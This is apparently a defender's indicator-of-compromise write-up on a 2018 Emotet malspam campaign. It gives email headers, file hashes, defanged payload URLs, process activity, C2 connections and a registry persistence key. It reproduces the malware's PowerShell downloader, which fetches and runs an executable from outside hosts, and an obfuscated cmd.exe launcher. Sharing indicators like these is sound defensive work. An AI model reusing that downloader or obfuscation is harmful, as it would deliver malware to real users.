#emolet_011018

#IOC #OptiData #VR #Emotet #W97M #Macro #powershell

https://pastebin.com/Y6DnbpHv

email_headers
--------------
#1
Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
	by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
	for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
	(envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
Date: Mon, 1 Oct 2018 08:46:50 +0000
From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>
To: user1@victim{.} com
Subject: Invoice from Интернет-магазин С торгом

#2
Received-PRA: pass ;
Received-SPF: pass ;
Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
	Mon, 01 Oct 2018 11:46:29 +0300
Received: from mail.btconnect{.} com (rd11780omr12.iuser.iroot.adidom{.} com [10.187.89.173])
	by rd11780slr11.dci.bt{.} com (MOS 4.4.8-GA)
	with ESMTP id AMS19190;
	Mon, 1 Oct 2018 09:46:27 +0100
Received: (from localhost [127.0.0.1])
	by rd11780omr12.dci.bt{.} com (MOS 4.4.8-GA)
	id QYL41356;
	Mon,  1 Oct 2018 09:46:27 +0100 (BST)
Received: from router-heim.i-netpartner.net (EHLO 10.5.21.12) ([217.23.56.98])
	by rd11780omr12.dci.bt{.} com
	with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
	Mon, 01 Oct 2018 09:46:26 +0100 (BST)
Date: Mon, 01 Oct 2018 10:46:26 +0100
From: Ващенко Інна <inna@razumkov.org.ua> <parkhillvets@btconnect{.} com>
To: user2@victim2
Subject: Invoice from Ващенко Інна

files
--------------
SHA-256	84803f2f3f575a5cb48fd7eabd9b0e8e73776b2fd8f3b3e098c8709d282c7fd7
File name	FILE_58873.doc
File size	66.63 KB

SHA-256	fe516708fe6db062b525795e67100e846257135e5a30526839ed405bf05ed4a5
File name	U5CUyRF7hzz.exe
File size	184 KB

h11p: \gidamikrobiyoloji{.} com/IBfAlRX
h11p: \madisonda{.} com/BacOqsvFqz
h11p: \motiondev{.} com{.} br/1cTvBSu2P
h11p: \fluorescent{.} cc/KxcY1d6R
h11p: \kristianmarlow{.} com/Sy5IRFsRU9

powershell $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}

activity
**************

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\CMd.exe  /V/C"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
"C:\Users\Public\992.exe"
"C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"

netwrk
--------------
185.179.26.24	gidamikrobiyoloji{.} com	GET /IBfAlRX/ HTTP/1.1 	no User Agent
"190.2.50.193","190.2.50.193:443","GET / HTTP/1.1 ","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;

comp
--------------
powershell.exe	1556	185.179.26.24	80	ESTABLISHED
xpathcab.exe	3720	190.215.241.14	8080	SYN_SENT
xpathcab.exe	3720	190.2.50.193	443	SYN_SENT

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run				01.10.2018 14:22
xpathcab			c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe	01.10.2018 13:00

# # #